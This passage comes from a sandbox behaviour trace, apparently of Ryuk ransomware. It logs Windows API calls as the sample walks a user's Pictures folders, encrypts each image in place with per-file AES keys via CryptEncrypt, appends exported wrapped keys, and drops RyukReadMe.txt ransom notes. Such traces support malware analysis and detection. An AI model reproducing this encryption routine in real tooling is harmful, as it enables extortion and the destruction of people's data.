nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0157.867] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.868] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0157.868] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.868] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.868] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x152cb, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x152cb, lpOverlapped=0x0) returned 1 [0157.869] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0157.869] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x152cb, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x152d0) returned 1 [0157.870] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.870] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x152d0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x152d0, lpOverlapped=0x0) returned 1 [0157.870] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0157.870] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0157.870] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0157.870] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0157.870] CloseHandle (hObject=0x18c) returned 1 [0157.885] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.889] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.889] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.889] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0157.889] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.889] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\5xakifrj EQJh5DP.bmp", dwFileAttributes=0x80) returned 1 [0157.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\5xakifrj EQJh5DP.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\5xakifrj eqjh5dp.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0157.890] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=70773) returned 1 [0157.890] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=70773) returned 1 [0157.890] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x11353, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.890] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0157.890] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.890] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0157.890] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.891] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.891] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x11475, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x11475, lpOverlapped=0x0) returned 1 [0157.892] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0157.892] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x11475, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x11480) returned 1 [0157.892] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.892] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11480, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x11480, lpOverlapped=0x0) returned 1 [0157.893] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0157.893] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0157.893] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0157.893] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0157.893] CloseHandle (hObject=0x18c) returned 1 [0157.909] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.913] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.913] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.913] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0157.913] SetLastError (dwErrCode=0x0) [0157.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0157.914] GetLastError () returned 0x0 [0157.914] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0157.915] CloseHandle (hObject=0x18c) returned 1 [0157.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0157.915] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.915] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.915] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.915] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\3DGlVVDZynoWEX.gif", dwFileAttributes=0x80) returned 1 [0157.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\3DGlVVDZynoWEX.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\eetwpz3\\3dglvvdzynowex.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.915] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=83454) returned 1 [0157.915] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=83454) returned 1 [0157.915] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x144dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.916] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0157.916] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.916] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0157.916] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.916] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.916] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x145fe, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x145fe, lpOverlapped=0x0) returned 1 [0157.918] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0157.918] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x145fe, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x14600) returned 1 [0157.918] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.918] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14600, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x14600, lpOverlapped=0x0) returned 1 [0157.918] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0157.919] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.919] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.919] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0157.919] CloseHandle (hObject=0x190) returned 1 [0157.934] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.938] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.938] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.938] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.938] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.938] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\eXsEULGQ6.gif", dwFileAttributes=0x80) returned 1 [0157.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\eXsEULGQ6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\eetwpz3\\exseulgq6.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.939] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=75889) returned 1 [0157.939] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=75889) returned 1 [0157.939] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1274f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.939] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0157.939] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.939] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0157.940] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.940] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.940] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12871, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x12871, lpOverlapped=0x0) returned 1 [0157.949] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0157.949] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x12871, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x12880) returned 1 [0157.949] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.949] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12880, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x12880, lpOverlapped=0x0) returned 1 [0157.950] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0157.950] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.950] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.950] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0157.950] CloseHandle (hObject=0x190) returned 1 [0157.965] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.969] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.969] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.969] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.970] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\Fd4wLMTn3sqOWN7K.png", dwFileAttributes=0x80) returned 1 [0157.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\Fd4wLMTn3sqOWN7K.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\eetwpz3\\fd4wlmtn3sqown7k.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.970] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=11892) returned 1 [0157.970] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=11892) returned 1 [0157.970] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x2d52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.970] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0157.971] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.971] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0157.971] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.971] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.971] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2e74, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x2e74, lpOverlapped=0x0) returned 1 [0157.971] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0157.971] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x2e74, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x2e80) returned 1 [0157.972] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.972] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x2e80, lpOverlapped=0x0) returned 1 [0157.972] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0157.972] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.972] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.972] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0157.972] CloseHandle (hObject=0x190) returned 1 [0158.008] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.012] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.012] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.013] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.013] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.013] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\qAjwTG3wh.gif", dwFileAttributes=0x80) returned 1 [0158.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\qAjwTG3wh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\eetwpz3\\qajwtg3wh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.013] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=43693) returned 1 [0158.013] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=43693) returned 1 [0158.013] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xa98b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.013] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.014] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.014] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.014] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.014] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.014] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xaaad, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xaaad, lpOverlapped=0x0) returned 1 [0158.015] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.015] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xaaad, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xaab0) returned 1 [0158.015] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.015] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xaab0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xaab0, lpOverlapped=0x0) returned 1 [0158.015] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.016] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, 